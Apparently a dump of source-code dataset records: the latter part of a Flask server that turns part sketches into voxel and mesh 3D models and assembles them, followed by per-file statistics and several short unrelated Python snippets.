pos_pre = cached_part_pose_list[i]
center = np.array((pos_pre[0], pos_pre[1], pos_pre[2]), dtype=float)
scale = float(pos_pre[3])
scale_ratio = scale/part_scale
length = (part_bbox_max - part_bbox_min) * scale_ratio
bbox_min = np.array(np.clip(center - length / 2., a_min=0, a_max=opt.spaceSize-1), dtype=int)
length = np.ceil(length).astype(int)
print('b box min max',bbox_min)
#128 * 128 * 128
tmp_vox = np.zeros((opt.spaceSize, opt.spaceSize, opt.spaceSize), dtype=np.uint8)
tmp_vox[bbox_min[0]: bbox_min[0] + length[0], bbox_min[1]: bbox_min[1] + length[1],
bbox_min[2]: bbox_min[2] + length[2]] = 1
tmp_pos = np.where(tmp_vox > 0.1)
tmp_pos = np.array(tmp_pos, dtype=float).transpose()
tmp_pos_int = np.array(tmp_pos, dtype=int)
center_arr.append(center.tolist())
tmp_pos -= center
tmp_pos = tmp_pos/scale_ratio
scale_ratio_arr.append(scale_ratio)
tmp_pos += part_center
part_center_arr.append(part_center.tolist())
vox_center_list.append(part_center.tolist())
vox_length_list.append(scale_ratio)
tmp_pos_part_int = np.array(tmp_pos, dtype=int)
tmp_pos_part_int = np.clip(tmp_pos_part_int, a_min=0, a_max=part_size-1)
current_vox = np.zeros((opt.spaceSize, opt.spaceSize, opt.spaceSize), dtype=np.uint8)
whole_vox[tmp_pos_int[:, 0], tmp_pos_int[:, 1], tmp_pos_int[:, 2]] += part_vox[
tmp_pos_part_int[:, 0], tmp_pos_part_int[:, 1], tmp_pos_part_int[:, 2]]
current_vox[tmp_pos_int[:, 0], tmp_pos_int[:, 1], tmp_pos_int[:, 2]] += part_vox[
tmp_pos_part_int[:, 0], tmp_pos_part_int[:, 1], tmp_pos_part_int[:, 2]]
voxel_to_send.append(np.array(np.where(current_vox > 0.1)).tolist())
current_mesh = extract_mesh(current_vox.astype(float), threshold=opt.thres, n_face_simp=6000)
current_mesh_list.append(current_mesh)
current_mesh_ascii = current_mesh.export(file_type='ply',encoding='ascii')
cached_model_list.append(str(current_mesh_ascii,encoding='ascii'))
mesh = extract_mesh(whole_vox.astype(float), threshold=opt.thres, n_face_simp=6000)
mesh_ascii = mesh.export(file_type='ply',encoding='ascii')
print('fin cached part pose list',cached_part_pose_list)
#print(cached_model_list)
# each part pose
# each
ret_dict = {
'assembled_model': str(mesh_ascii,encoding='ascii'),
#'each_part_vox': voxel_to_send,
'each_part_mesh': cached_model_list,
}
res = jsonify(ret_dict)
#make_response(jsonify(ret_dict),200)
torch.cuda.empty_cache()
return res
@app.route('/assembleFromImagesNew', methods=['POST'])
def assembleFromImagesNew():
torch.set_grad_enabled(False)
request_dict = json.loads(request.data)
cached_model_list = []
cached_vox_list = []
cached_part_pose_list = []
part_data_list = request_dict['part_image']
whole_image = Image.open(BytesIO(base64.b64decode(request_dict['whole_image'].split(',')[1]))).resize((256,256),Image.LANCZOS)
hx,hy = whole_image.size
fin_whole = Image.new('RGBA', whole_image.size, (255,255,255))
fin_whole.paste(whole_image,(0, 0, hx, hy), whole_image)
part_vox_list = request_dict['part_vox']
# infer
procesed_img_list = []
vox_array_list = []
vox_pose_list = []
vox_center_list = []
vox_length_list = []
for i in range(len(part_data_list)):
current_url = part_data_list[i].split(',')[1]
current_url = base64.b64decode(current_url)
current_url = BytesIO(current_url)
current_img = Image.open(current_url)
current_img = current_img.resize((256,256),Image.LANCZOS)
#add a white background
cx,cy = current_img.size
p = Image.new('RGBA', current_img.size, (255,255,255))
p.paste(current_img, (0, 0, cx, cy), current_img)
procesed_img_list.append(p)
xs = np.array(part_vox_list[i][0],dtype=int)
ys = np.array(part_vox_list[i][1],dtype=int)
zs = np.array(part_vox_list[i][2],dtype=int)
v_s = np.array(part_vox_list[i][3],dtype=float).reshape(-1)
#voxres
cur_vox = np.zeros(shape=(vox_res,vox_res,vox_res),dtype=float)
cur_vox[xs,ys,zs] = v_s
#cur_vox = infer_shape_from_sketch_and_save_no_mesh(p)
#cached_model_list.append(str(cur_mesh_bit,encoding='ascii'))
cached_vox_list.append(cur_vox)
#vox_array_listvox_array_list.append(cur_vox.tolist())
#calculate the pose
for i in range(len(cached_vox_list)):
current_pose = infer_pose_from_sketch(fin_whole, procesed_img_list[i],cached_vox_list[i])
cached_part_pose_list.append(current_pose)
#vox_pose_list.append(current_pose.tolist())
#part_pos_to_list = [t.tolist() for t in cached_part_pose_list]
#start to assemble
whole_vox = np.zeros((opt.spaceSize, opt.spaceSize, opt.spaceSize), dtype=np.uint8)
#print("part num ",cached_part_pose_list)
center_arr = []
part_center_arr = []
scale_ratio_arr = []
voxel_to_send = []
cleaned_smoothed_mesh = []
cleaned_smoothed_face = []
cleaned_smoothed_points = []
base_vertices_num = 0
for i in range(len(cached_part_pose_list)):
part_vox = cached_vox_list[i]
part_vox = np.array(part_vox, dtype='float')
#print('part vox shape', part_vox.shape)
#part_vox = np.array(part_vox)
part_size = part_vox.shape[0]
part_pos = np.where(part_vox > 0.01)
#print('part pose before',part_pos)
part_pos = np.array(part_pos).transpose()
#print('part pose after',part_pos)
part_bbox_min = np.min(part_pos, axis=0)
part_bbox_max = np.max(part_pos, axis=0)
part_center = (part_bbox_min + part_bbox_max) / 2.
part_scale = np.linalg.norm(part_bbox_max - part_bbox_min) / 2.
pos_pre = cached_part_pose_list[i]
center = np.array((pos_pre[0], pos_pre[1], pos_pre[2]), dtype=float)
scale = float(pos_pre[3])
scale_ratio = scale/part_scale
length = (part_bbox_max - part_bbox_min) * scale_ratio
bbox_min = np.array(np.clip(center - length / 2., a_min=0, a_max=opt.spaceSize-1), dtype=int)
length = np.ceil(length).astype(int)
#print('b box min max',bbox_min)
#128 * 128 * 128
tmp_vox = np.zeros((opt.spaceSize, opt.spaceSize, opt.spaceSize), dtype=np.uint8)
tmp_vox[bbox_min[0]: bbox_min[0] + length[0], bbox_min[1]: bbox_min[1] + length[1],
bbox_min[2]: bbox_min[2] + length[2]] = 1
tmp_pos = np.where(tmp_vox > 0.01)
tmp_pos = np.array(tmp_pos, dtype=float).transpose()
tmp_pos_int = np.array(tmp_pos, dtype=int)
center_arr.append(center.tolist())
tmp_pos -= center
tmp_pos = tmp_pos/scale_ratio
scale_ratio_arr.append(scale_ratio)
tmp_pos += part_center
part_center_arr.append(part_center.tolist())
vox_center_list.append(part_center.tolist())
vox_length_list.append(scale_ratio)
tmp_pos_part_int = np.array(tmp_pos, dtype=int)
tmp_pos_part_int = np.clip(tmp_pos_part_int, a_min=0, a_max=part_size-1)
current_vox = np.zeros((opt.spaceSize, opt.spaceSize, opt.spaceSize), dtype=float)
#whole_vox[tmp_pos_int[:, 0], tmp_pos_int[:, 1], tmp_pos_int[:, 2]] += part_vox[
# tmp_pos_part_int[:, 0], tmp_pos_part_int[:, 1], tmp_pos_part_int[:, 2]]
current_vox[tmp_pos_int[:, 0], tmp_pos_int[:, 1], tmp_pos_int[:, 2]] += part_vox[
tmp_pos_part_int[:, 0], tmp_pos_part_int[:, 1], tmp_pos_part_int[:, 2]]
#voxel_to_send.append(np.array(np.where(current_vox > 0.1)).tolist())
current_mesh = extract_mesh(current_vox.astype(float), threshold=opt.thres, n_face_simp=5000)
splitted_mesh = current_mesh.split()
chosen_id = -1
max_points = -1
if(len(splitted_mesh)>0):
for i in range(0,len(splitted_mesh)):
if (splitted_mesh[i].vertices.shape[0] > max_points):
chosen_id = i
max_points = splitted_mesh[i].vertices.shape[0]
current_mesh = splitted_mesh[chosen_id]
trimesh.smoothing.filter_taubin(current_mesh,iterations=10,nu=0.5,lamb=0.9)
current_mesh_ascii = current_mesh.export(file_type='ply',encoding='ascii')
cached_model_list.append(str(current_mesh_ascii,encoding='ascii'))
cleaned_smoothed_mesh.append(current_mesh)
cleaned_smoothed_face += (current_mesh.faces + base_vertices_num).tolist()
cleaned_smoothed_points += current_mesh.vertices.tolist()
base_vertices_num += current_mesh.vertices.shape[0]
#interfaces.blender.boolean(cleaned_smoothed_mesh,operation='union', debug=False)
union_mesh = trimesh.Trimesh(vertices=np.array(cleaned_smoothed_points),faces=np.array(cleaned_smoothed_face))
"""
union_mesh.export('meshunion.ply')
fin_whole_vox = -1
cur_pitch = 1.0/128
occupancy_points = []
b_min = []
b_max = []
trimesh_mesh = []
for i in range(len(cleaned_smoothed_mesh)):
new_mesh = cleaned_smoothed_mesh[i]
new_mesh.remove_degenerate_faces()
trimesh.repair.fill_holes(new_mesh)
c_max = np.max(new_mesh.vertices,0)
c_min = np.min(new_mesh.vertices,0)
b_min.append(c_min.tolist())
b_max.append(c_max.tolist())
new_vox = new_mesh.voxelized(pitch=cur_pitch)
occupancy_points = occupancy_points + new_vox.indices_to_points(new_vox.sparse_indices).tolist()
trimesh_mesh.append(new_mesh)
b_min = np.min(np.array(b_min),0)
b_max = np.max(np.array(b_max),0)
b_mid = (b_min + b_max )*0.5
occupancy_points = np.array(occupancy_points)
#print("occupancy points shape",np.max((occupancy_points),0),np.min((occupancy_points),0))
occupancy_points += 0.5
occupancy_points *= opt.spaceSize
occupancy_points_int = np.array(occupancy_points, dtype=np.int)
occupancy_points_int = np.clip(occupancy_points_int, a_min=0, a_max=opt.spaceSize-1)
whole_occ_grid = np.zeros((opt.spaceSize, opt.spaceSize, opt.spaceSize), dtype=np.float)
whole_occ_grid[occupancy_points_int[:,0],occupancy_points_int[:,1],occupancy_points_int[:,2]] += 0.5
fin_mesh = extract_mesh(whole_occ_grid.astype(np.float), threshold=opt.thres)
#trimesh.smoothing.filter_taubin(fin_mesh)
n_min, n_max = np.min(fin_mesh.vertices,0), np.max(fin_mesh.vertices,0)
fin_mesh.vertices *= (b_max-b_min) / (n_max-n_min)
n_min, n_max = np.min(fin_mesh.vertices,0), np.max(fin_mesh.vertices,0)
n_mid = (n_min + n_max) * 0.5
fin_mesh.vertices += b_mid - n_mid
#fin_mesh.export('full_mesh.ply')
trimesh.smoothing.filter_humphrey(fin_mesh)
"""
fin_mesh_ascii = union_mesh.export(file_type='ply',encoding='ascii')
ret_dict = {
'assembled_model': str(fin_mesh_ascii,encoding='ascii'),
'each_part_mesh': cached_model_list,
}
res = jsonify(ret_dict)
#make_response(jsonify(ret_dict),200)
torch.cuda.empty_cache()
return res
"""
@app.route('/assembleFromImagesNew', methods=['POST'])
def assembleFromImagesNew():
torch.set_grad_enabled(False)
request_dict = json.loads(request.data)
cached_model_list = []
cached_vox_list = []
cached_part_pose_list = []
part_data_list = request_dict['part_image']
whole_image = Image.open(BytesIO(base64.b64decode(request_dict['whole_image'].split(',')[1]))).resize((256,256),Image.ANTIALIAS)
hx,hy = whole_image.size
fin_whole = Image.new('RGBA', whole_image.size, (255,255,255))
fin_whole.paste(whole_image,(0, 0, hx, hy), whole_image)
part_vox_list = request_dict['part_vox']
# infer
procesed_img_list = []
vox_array_list = []
vox_pose_list = []
vox_center_list = []
vox_length_list = []
for i in range(len(part_data_list)):
current_url = part_data_list[i].split(',')[1]
current_url = base64.b64decode(current_url)
current_url = BytesIO(current_url)
current_img = Image.open(current_url)
current_img = current_img.resize((256,256),Image.ANTIALIAS)
#add a white background
cx,cy = current_img.size
p = Image.new('RGBA', current_img.size, (255,255,255))
p.paste(current_img, (0, 0, cx, cy), current_img)
procesed_img_list.append(p)
xs = np.array(part_vox_list[i][0],dtype=np.int)
ys = np.array(part_vox_list[i][1],dtype=np.int)
zs = np.array(part_vox_list[i][2],dtype=np.int)
v_s = np.array(part_vox_list[i][3],dtype=np.float).reshape(-1)
#voxres
cur_vox = np.zeros(shape=(vox_res,vox_res,vox_res),dtype=np.float)
cur_vox[xs,ys,zs] = v_s
cached_vox_list.append(cur_vox)
#vox_array_listvox_array_list.append(cur_vox.tolist())
#calculate the pose
for i in range(len(cached_vox_list)):
current_pose = infer_pose_from_sketch(fin_whole, procesed_img_list[i],cached_vox_list[i])
cached_part_pose_list.append(current_pose)
#vox_pose_list.append(current_pose.tolist())
#part_pos_to_list = [t.tolist() for t in cached_part_pose_list]
#start to assemble
whole_vox = np.zeros((opt.spaceSize, opt.spaceSize, opt.spaceSize), dtype=np.float)
#print("part num ",cached_part_pose_list)
center_arr = []
part_center_arr = []
scale_ratio_arr = []
voxel_to_send = []
cleaned_smoothed_mesh = []
org_vox = []
with_noise_max = []
with_noise_min = []
for i in range(len(cached_part_pose_list)):
part_vox = cached_vox_list[i]
part_vox = np.array(part_vox, dtype='float')
part_size = part_vox.shape[0]
part_pos = np.where(part_vox > 0.01)
#print('part pose before',part_pos)
part_pos = np.array(part_pos).transpose()
#print('part pose after',part_pos)
part_bbox_min = np.min(part_pos, axis=0)
part_bbox_max = np.max(part_pos, axis=0)
part_center = (part_bbox_min + part_bbox_max) / 2.
part_scale = np.linalg.norm(part_bbox_max - part_bbox_min) / 2.
pos_pre = cached_part_pose_list[i]
center = np.array((pos_pre[0], pos_pre[1], pos_pre[2]), dtype=np.float)
scale = np.float(pos_pre[3])
scale_ratio = scale/part_scale
length = (part_bbox_max - part_bbox_min) * scale_ratio
bbox_min = np.array(np.clip(center - length / 2., a_min=0, a_max=opt.spaceSize-1), dtype=np.int)
length = np.ceil(length).astype(np.int)
tmp_vox = np.zeros((opt.spaceSize, opt.spaceSize, opt.spaceSize), dtype=np.uint8)
tmp_vox[bbox_min[0]: bbox_min[0] + length[0], bbox_min[1]: bbox_min[1] + length[1],
bbox_min[2]: bbox_min[2] + length[2]] = 1
tmp_pos = np.where(tmp_vox > 0.01)
tmp_pos = np.array(tmp_pos, dtype=np.float).transpose()
tmp_pos_int = np.array(tmp_pos, dtype=np.int)
center_arr.append(center.tolist())
tmp_pos -= center
tmp_pos = tmp_pos/scale_ratio
scale_ratio_arr.append(scale_ratio)
tmp_pos += part_center
part_center_arr.append(part_center.tolist())
vox_center_list.append(part_center.tolist())
vox_length_list.append(scale_ratio)
tmp_pos_part_int = np.array(tmp_pos, dtype=np.int)
tmp_pos_part_int = np.clip(tmp_pos_part_int, a_min=0, a_max=part_size-1)
current_vox = np.zeros((opt.spaceSize, opt.spaceSize, opt.spaceSize), dtype=np.float)
current_vox[tmp_pos_int[:, 0], tmp_pos_int[:, 1], tmp_pos_int[:, 2]] += part_vox[
tmp_pos_part_int[:, 0], tmp_pos_part_int[:, 1], tmp_pos_part_int[:, 2]]
whole_vox[tmp_pos_int[:, 0], tmp_pos_int[:, 1], tmp_pos_int[:, 2]] += part_vox[
tmp_pos_part_int[:, 0], tmp_pos_part_int[:, 1], tmp_pos_part_int[:, 2]]
org_vox.append(current_vox)
#voxel_to_send.append(np.array(np.where(current_vox > 0.1)).tolist())
current_mesh = extract_mesh(current_vox.astype(np.float), threshold=opt.thres, n_face_simp=5000)
cur_with_noise_max = np.max(current_mesh.vertices,0)
cur_with_noise_min = np.min(current_mesh.vertices,0)
with_noise_max.append(cur_with_noise_max)
with_noise_min.append(cur_with_noise_min)
splitted_mesh = current_mesh.split()
chosen_id = -1
max_points = -1
if(len(splitted_mesh)>0):
for i in range(0,len(splitted_mesh)):
if (splitted_mesh[i].vertices.shape[0] > max_points):
chosen_id = i
max_points = splitted_mesh[i].vertices.shape[0]
current_mesh = splitted_mesh[chosen_id]
trimesh.smoothing.filter_taubin(current_mesh,iterations=20,nu=0.5,lamb=0.9)
current_mesh_ascii = current_mesh.export(file_type='ply',encoding='ascii')
cached_model_list.append(str(current_mesh_ascii,encoding='ascii'))
cleaned_smoothed_mesh.append(current_mesh)
#merged_mesh = trimesh.creation(current_mesh_list)
#merged_mesh.export("yahoo.ply")
whole_mesh = extract_mesh(whole_vox.astype(np.float), threshold=opt.thres, n_face_simp=10000)
splitted_mesh = whole_mesh.split()
chosen_id = -1
max_points = -1
if(len(splitted_mesh)>0):
for i in range(0,len(splitted_mesh)):
if (splitted_mesh[i].vertices.shape[0] > max_points):
chosen_id = i
max_points = splitted_mesh[i].vertices.shape[0]
whole_mesh = splitted_mesh[chosen_id]
fin_mesh_ascii = whole_mesh.export(file_type='ply',encoding='ascii')
ret_dict = {
'assembled_model': str(fin_mesh_ascii,encoding='ascii'),
'each_part_mesh': cached_model_list,
}
res = jsonify(ret_dict)
#make_response(jsonify(ret_dict),200)
torch.cuda.empty_cache()
return res
"""
@app.route('/inferAllParts',methods=['POST'])
def inferAllParts():
torch.set_grad_enabled(False)
request_dict = json.loads(request.data)
cached_model_list = []
cached_vox_list = []
part_data_list = request_dict['part_image']
current_vox_array_list = []
for i in range(len(part_data_list)):
current_url = part_data_list[i].split(',')[1]
current_url = base64.b64decode(current_url)
current_url = BytesIO(current_url)
current_img = Image.open(current_url)
#print('channel num',current_img.)
current_img = current_img.resize((256,256),Image.LANCZOS)
#add a white background
cx,cy = current_img.size
p = Image.new('RGBA', current_img.size, (255,255,255))
p.paste(current_img, (0, 0, cx, cy), current_img)
cur_mesh_bit, cur_vox = infer_shape_from_sketch_and_save(p)
cached_model_list.append(str(cur_mesh_bit,encoding='ascii'))
cur_idx = np.where(cur_vox>0.01)
cur_vox_value = cur_vox[cur_idx[0],cur_idx[1],cur_idx[2]]
cached_vox_list.append([cur_idx[0].tolist(), cur_idx[1].tolist(),cur_idx[2].tolist(),cur_vox_value.tolist()])
#print(np.where(cur_vox>0))
#print(cached_model_list)
ret_dict = {
'all_parts': cached_model_list,
'all_voxes':cached_vox_list,
}
res = jsonify(ret_dict)
#make_response(jsonify(ret_dict),200)
torch.cuda.empty_cache()
return res
@app.route('/changeModelType',methods=['POST'])
def changeModelType():
request_dict = json.loads(request.data)
next_model_type = request_dict['modelType']
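# Hot-swap the generator and assembler checkpoints for the requested category without restarting the server.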
if(True):
generator_model_path = './checkpoint/'+ next_model_type + '/generator.pt'
generator_network.load_state_dict(torch.load(generator_model_path,'cpu'))
generator_network.cuda()
generator_network.eval()
# load assemble model
assemble_model_path = './checkpoint/'+ next_model_type + '/assembler.pt'
assemble_network.load_state_dict(torch.load(assemble_model_path,map_location='cpu'))
assemble_network.cuda()
assemble_network.eval()
ret_dict = {
'spaceholder':'heihei'
}
res = jsonify(ret_dict)
return res
@app.route('/generateTransformedResults',methods=['POST'])
def generateTransformedResults():
request_dict = json.loads(request.data)
print(request_dict.keys())
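# Apply the user's per-part scale and translation to each mesh, then concatenate everything into a single "union" mesh for the reply.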
mesh_arr = []
tranform_arr = []
scale_arr = []
trimesh_mesh = []
part_vox_info_arr = []
#print(request_dict['scale_arr'],request_dict['transform_arr'])
for i in range(len(request_dict['scale_arr'])):
scale_arr.append(np.array([request_dict['scale_arr'][i][0],request_dict['scale_arr'][i][1],request_dict['scale_arr'][i][2]]) )
tranform_arr.append(np.array([request_dict['transform_arr'][i][0],request_dict['transform_arr'][i][1],request_dict['transform_arr'][i][2]]))
mesh_arr.append(request_dict['mesh_string_arr'][i])
fin_whole_vox = -1
cur_pitch = 1.0/128
occupancy_points = []
b_min = []
b_max = []
cleaned_smoothed_face = []
cleaned_smoothed_points = []
base_vertices_num = 0
for i in range(len(mesh_arr)):
new_mesh = trimesh.load(file_obj= BytesIO(mesh_arr[i].encode(encoding='utf-8')),file_type='ply')
new_mesh.remove_degenerate_faces()
#print('mesh shape',i,new_mesh.vertices.shape,new_mesh.is_watertight)
trimesh.repair.fill_holes(new_mesh)
#print(scale_arr[i],tranform_arr[i])
new_mesh.vertices[:,0] *= scale_arr[i][0]
new_mesh.vertices[:,1] *= scale_arr[i][1]
new_mesh.vertices[:,2] *= scale_arr[i][2]
new_mesh.vertices[:,0] += tranform_arr[i][0]
new_mesh.vertices[:,1] += tranform_arr[i][1]
new_mesh.vertices[:,2] += tranform_arr[i][2]
c_max = np.max(new_mesh.vertices,0)
c_min = np.min(new_mesh.vertices,0)
b_min.append(c_min.tolist())
b_max.append(c_max.tolist())
new_vox = new_mesh.voxelized(pitch=cur_pitch)
print(new_vox.scale)
occupancy_points = occupancy_points + new_vox.indices_to_points(new_vox.sparse_indices).tolist()
trimesh_mesh.append(new_mesh)
#cleaned_smoothed_mesh.append(current_mesh)
cleaned_smoothed_face += (new_mesh.faces + base_vertices_num).tolist()
cleaned_smoothed_points += new_mesh.vertices.tolist()
base_vertices_num += new_mesh.vertices.shape[0]
union_mesh = trimesh.Trimesh(vertices=np.array(cleaned_smoothed_points),faces=np.array(cleaned_smoothed_face))
#union_vox = trimesh.voxel.creation.voxelize(union_mesh,pitch=cur_pitch)
fin_mesh_ascii = union_mesh.export(file_type='ply',encoding='ascii')
#union_vox.marching_cubes.export('fin_marching_cubes.ply')
ret_dict = {
'assembled_model': str(fin_mesh_ascii,encoding='ascii'),
'each_part_mesh': [str(t.export(file_type='ply',encoding='ascii') ,encoding='ascii') for t in trimesh_mesh]
}
res = jsonify(ret_dict)
return res
"""
@app.route('/generateTransformedResults',methods=['POST'])
def generateTransformedResults():
request_dict = json.loads(request.data)
print(request_dict.keys())
mesh_arr = []
tranform_arr = []
scale_arr = []
trimesh_mesh = []
part_vox_info_arr = []
#print(request_dict['scale_arr'],request_dict['transform_arr'])
for i in range(len(request_dict['scale_arr'])):
scale_arr.append(np.array([request_dict['scale_arr'][i][0],request_dict['scale_arr'][i][1],request_dict['scale_arr'][i][2]]) )
tranform_arr.append(np.array([request_dict['transform_arr'][i][0],request_dict['transform_arr'][i][1],request_dict['transform_arr'][i][2]]))
mesh_arr.append(request_dict['mesh_string_arr'][i])
fin_whole_vox = -1
cur_pitch = 1.0/128
occupancy_points = []
b_min = []
b_max = []
for i in range(len(mesh_arr)):
new_mesh = trimesh.load(file_obj= BytesIO(mesh_arr[i].encode(encoding='utf-8')),file_type='ply')
new_mesh.remove_degenerate_faces()
#print('mesh shape',i,new_mesh.vertices.shape,new_mesh.is_watertight)
trimesh.repair.fill_holes(new_mesh)
#print(scale_arr[i],tranform_arr[i])
new_mesh.vertices[:,0] *= scale_arr[i][0]
new_mesh.vertices[:,1] *= scale_arr[i][1]
new_mesh.vertices[:,2] *= scale_arr[i][2]
new_mesh.vertices[:,0] += tranform_arr[i][0]
new_mesh.vertices[:,1] += tranform_arr[i][1]
new_mesh.vertices[:,2] += tranform_arr[i][2]
c_max = np.max(new_mesh.vertices,0)
c_min = np.min(new_mesh.vertices,0)
b_min.append(c_min.tolist())
b_max.append(c_max.tolist())
new_vox = new_mesh.voxelized(pitch=cur_pitch)
print(new_vox.scale)
occupancy_points = occupancy_points + new_vox.indices_to_points(new_vox.sparse_indices).tolist()
#new_mesh.export(str(i)+'.ply')
#print('mesh shape',i,new_mesh.vertices.shape,new_mesh.is_watertight)
trimesh_mesh.append(new_mesh)
#fin_whole_vox = trimesh.voxel.VoxelGrid(encoding=trimesh.voxel.ops.sparse_to_matrix(np.array(occupancy_points)))
b_min = np.min(np.array(b_min),0)
b_max = np.max(np.array(b_max),0)
b_mid = (b_min + b_max )*0.5
occupancy_points = np.array(occupancy_points)
#print("occupancy points shape",np.max((occupancy_points),0),np.min((occupancy_points),0))
occupancy_points += 0.5
occupancy_points *= opt.spaceSize
occupancy_points_int = np.array(occupancy_points, dtype=np.int)
occupancy_points_int = np.clip(occupancy_points_int, a_min=0, a_max=opt.spaceSize-1)
whole_occ_grid = np.zeros((opt.spaceSize, opt.spaceSize, opt.spaceSize), dtype=np.uint8)
whole_occ_grid[occupancy_points_int[:,0],occupancy_points_int[:,1],occupancy_points_int[:,2]] += 1
fin_mesh = extract_mesh(whole_occ_grid.astype(np.float), threshold=opt.thres)
trimesh.smoothing.filter_taubin(fin_mesh,iterations=5)
n_min, n_max = np.min(fin_mesh.vertices,0), np.max(fin_mesh.vertices,0)
fin_mesh.vertices *= (b_max-b_min) / (n_max-n_min)
n_min, n_max = np.min(fin_mesh.vertices,0), np.max(fin_mesh.vertices,0)
n_mid = (n_min + n_max) * 0.5
fin_mesh.vertices += b_mid - n_mid
#fin_mesh.export('full_mesh.ply')
fin_mesh_ascii = fin_mesh.export(file_type='ply',encoding='ascii')
#print(cached_model_list)
# each part pose
# each
ret_dict = {
'assembled_model': str(fin_mesh_ascii,encoding='ascii'),
'each_part_mesh': [str(t.export(file_type='ply',encoding='ascii') ,encoding='ascii') for t in trimesh_mesh]
}
res = jsonify(ret_dict)
return res
"""
if __name__ == '__main__':
app.run(host='localhost', port=11451, debug=True)
| 36.781621
| 149
| 0.639927
| 5,253
| 37,223
| 4.214734
| 0.065867
| 0.020325
| 0.01355
| 0.015854
| 0.843406
| 0.820235
| 0.804607
| 0.801581
| 0.79178
| 0.777868
| 0
| 0.019988
| 0.224485
| 37,223
| 1,012
| 150
| 36.781621
| 0.746978
| 0.06359
| 0
| 0.547393
| 0
| 0
| 0.060837
| 0.016035
| 0
| 0
| 0
| 0
| 0
| 1
| 0.026066
| false
| 0
| 0.056872
| 0
| 0.109005
| 0.011848
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
4fd613cf30d8806814712e41217fbe159ecfe831
| 188
|
py
|
Python
|
Python/python_programming_stu/mycode/module_package/package/game/__main__.py
|
min9288/Multicampus
|
2aaac730b35e530f8f91cb1ba41c08ee18d59142
|
[
"MIT"
] | 2
|
2022-01-18T09:27:42.000Z
|
2022-03-29T14:59:00.000Z
|
Python/python_programming_stu/mycode/module_package/package/game/__main__.py
|
min9288/Multicampus
|
2aaac730b35e530f8f91cb1ba41c08ee18d59142
|
[
"MIT"
] | null | null | null |
Python/python_programming_stu/mycode/module_package/package/game/__main__.py
|
min9288/Multicampus
|
2aaac730b35e530f8f91cb1ba41c08ee18d59142
|
[
"MIT"
] | null | null | null |
from mycode.module_package.game.graphic.render import render_test
from mycode.module_package.game.sound.echo import echo_test
if __name__ == '__main__':
render_test()
echo_test()
| 26.857143
| 65
| 0.787234
| 27
| 188
| 4.962963
| 0.518519
| 0.149254
| 0.238806
| 0.343284
| 0.402985
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.12234
| 188
| 7
| 66
| 26.857143
| 0.812121
| 0
| 0
| 0
| 0
| 0
| 0.042328
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.4
| 0
| 0.4
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 6
|
4ff18bf52ad693e7a04990cc2eb9c2063a75b1e8
| 39
|
py
|
Python
|
modules/python-codes/modules/modules-packages/src/from-example.py
|
drigols/Studies
|
9c293156935b491ded24be6b511daac67fd43538
|
[
"MIT"
] | 1
|
2020-09-06T22:17:19.000Z
|
2020-09-06T22:17:19.000Z
|
modules/python-codes/modules/modules-packages/src/from-example.py
|
drigols/Studies
|
9c293156935b491ded24be6b511daac67fd43538
|
[
"MIT"
] | null | null | null |
modules/python-codes/modules/modules-packages/src/from-example.py
|
drigols/Studies
|
9c293156935b491ded24be6b511daac67fd43538
|
[
"MIT"
] | null | null | null |
from mathe import sqrt
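# Assuming the local 'mathe' module provides a math.sqrt-style function, this prints 5.0.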
print(sqrt(25))
| 13
| 22
| 0.769231
| 7
| 39
| 4.285714
| 0.857143
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.058824
| 0.128205
| 39
| 2
| 23
| 19.5
| 0.823529
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.5
| 0
| 0.5
| 0.5
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 1
|
0
| 6
|
8b10f1af3f1b76bc5695815a64f1f965ec67c9fa
| 130
|
py
|
Python
|
demo/views.py
|
panagiks/aiohttp-route
|
5144ca2a25b08215a6f36091a8300caceb3b18fb
|
[
"MIT"
] | null | null | null |
demo/views.py
|
panagiks/aiohttp-route
|
5144ca2a25b08215a6f36091a8300caceb3b18fb
|
[
"MIT"
] | null | null | null |
demo/views.py
|
panagiks/aiohttp-route
|
5144ca2a25b08215a6f36091a8300caceb3b18fb
|
[
"MIT"
] | null | null | null |
from aiohttp import web
from aiohttp_route import route
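# @route registers this view for GET on '/'; web.HTTPNoContent produces an empty 204 response.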
@route('GET', '/')
def handler(request):
return web.HTTPNoContent()
| 16.25
| 31
| 0.730769
| 17
| 130
| 5.529412
| 0.647059
| 0.234043
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.153846
| 130
| 7
| 32
| 18.571429
| 0.854545
| 0
| 0
| 0
| 0
| 0
| 0.030769
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.2
| false
| 0
| 0.4
| 0.2
| 0.8
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
|
0
| 6
|
8b22d89e31fa3906abb43ba61f271414ea940793
| 34
|
py
|
Python
|
src/pagnn/datapipe/__init__.py
|
ostrokach/protein-adjacency-net
|
fd3ad0b9034eb61b0187752c1f38f7eed1a8f1dc
|
[
"MIT"
] | 1
|
2022-01-16T12:06:13.000Z
|
2022-01-16T12:06:13.000Z
|
